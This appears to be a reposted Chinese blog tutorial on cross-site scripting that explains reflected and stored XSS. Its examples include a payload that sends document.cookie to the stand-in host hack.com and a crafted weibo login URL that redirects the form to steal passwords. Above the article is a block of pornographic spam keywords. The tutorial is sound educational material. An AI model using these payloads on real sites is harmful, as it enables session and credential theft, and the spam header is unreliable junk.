黄色网页视频 I 影音先锋日日狠狠久久 I 秋霞午夜毛片 I 秋霞一二三区 I 国产成人片无码视频 I 国产 精品 自在自线 I av免费观看网站 I 日本精品久久久久中文字幕5 I 91看视频 I 看全色黄大色黄女片18 I 精品不卡一区 I 亚洲最新精品 I 欧美 激情 在线 I 人妻少妇精品久久 I 国产99视频精品免费专区 I 欧美影院 I 欧美精品在欧美一区二区少妇 I av大片网站 I 国产精品黄色片 I 888久久 I 狠狠干最新 I 看看黄色一级片 I 黄色精品久久 I 三级av在线 I 69色综合 I 国产日韩欧美91 I 亚洲精品偷拍 I 激情小说亚洲图片 I 久久国产视频精品 I 国产综合精品一区二区三区 I 色婷婷国产 I 最新成人av在线 I 国产私拍精品 I 日韩成人影音 I 日日夜夜天天综合

談?wù)揦SS(一)

系統(tǒng) 2276 0

XSS 叫跨站腳本攻擊(Cross Site Script),那么XSS原本應(yīng)該叫做CSS,但是由于CSS的簡稱已經(jīng)被連級樣式表 使用了,所以就換個(gè)稱謂XSS。?

為什么叫做跨站腳本攻擊呢?
它的意思就是在別人的網(wǎng)站上嵌入腳本,而這個(gè)腳本原本不是屬于這個(gè)網(wǎng)站的。這個(gè)解釋很直觀吧。


怎么嵌入腳本呢?
談?wù)揦SS(一)
比如這么個(gè)搜索結(jié)果頁,當(dāng)用戶搜索test的時(shí)候,頁面會顯示“搜索關(guān)鍵詞:test”

這個(gè)時(shí)候,這里的test就很有可能會出現(xiàn)xss漏洞,如果該頁面是直接將用戶輸入的東西“返回”到頁面上,那么存在的xss漏洞就可以這樣利用:

輸入:<script>alert(1);</scrip>
那么頁面就會跳出alert(1);
這種XSS叫做反射性XSS。


再談?wù)摿硗庖环N場景,每個(gè)網(wǎng)站都有反饋框。允許用戶反饋數(shù)據(jù)給后臺。

而這個(gè)后臺一般都是管理員進(jìn)行審核,會在管理后臺展示。

如果一個(gè)<script>var x=new Image(); x.src=” http://hack.com?cookie= ”+document.cookie;</script>的反饋數(shù)據(jù)由用戶輸入

然后這個(gè)數(shù)據(jù)“直接”返回到管理后臺上,那么這個(gè)時(shí)候,管理后臺管理員的cookie就被作為參數(shù)傳遞到 http://hack.com ?了。后面 黑客 就可以使用cookie來做登錄管理后臺了。

這種XSS由于攻擊代碼存儲進(jìn)數(shù)據(jù)庫了,所以叫做存儲型XSS。



危害
一般來說,存儲型XSS的危害性大于反射型XSS。因?yàn)榉瓷湫蚗SS只會影響到自己,而存儲型的XSS可能會影響到網(wǎng)站的其他用戶。


XSS可以如上面例子說的:

1 盜取cookie

2 釣魚
比如我將一段代碼注入進(jìn)某個(gè)網(wǎng)站的支付頁面,這段js代碼做的事情是,動態(tài)控制這個(gè)支付頁面的Form表單,比如將這個(gè)form表單的html替換成目標(biāo)網(wǎng)站一個(gè)相似的html。

或者另一個(gè)案例是使用反射型XSS,我預(yù)先生成一個(gè)url,這個(gè)url是一個(gè)有反射型xss 漏洞 的頁面。比如

      document.getElementById("loginForm").action="http://hack.com"http://weibo.com/login?username=<script>document.getElementById("loginForm").action="http://hack.com"</script>
    

?

然后我將這個(gè)頁面通過企鵝的群郵件發(fā)給企鵝群中的所有人,一旦有人點(diǎn)擊這個(gè)鏈接,那么就會進(jìn)入微博登陸頁,萬一再輸入用戶名密碼,那么這個(gè)人的用戶名密碼就會被盜了。當(dāng)然,這個(gè)案例有個(gè)問題,url太假了,怎么辦?短鏈接服務(wù)。現(xiàn)在有很多廠商提供了短連接的服務(wù)。那么最后的鏈接是實(shí)際看不出來問題的。

3 DDOS攻擊
當(dāng)然這個(gè)前提是有大量用戶已經(jīng)被XSS攻擊了,所以他們?yōu)g覽的頁面已經(jīng)被植入了代碼,這個(gè)代碼的作用就是循環(huán)向一個(gè)網(wǎng)站發(fā)送請求,如果有xss漏洞的這個(gè)網(wǎng)站是有大量用戶的,比如微博,那么后一個(gè)被DDOS攻擊的網(wǎng)站就真心慘了。

總之,XSS的危害就在于網(wǎng)站的頁面可以被隨意嵌入js代碼。

轉(zhuǎn)自 : http://anquan.baidu.com/bbs/thread-130626-1-1.html

談?wù)揦SS(一)


更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號聯(lián)系: 360901061

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長非常感激您!手機(jī)微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對您有幫助就好】

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長會非常 感謝您的哦!!!

發(fā)表我的評論
最新評論 總共0條評論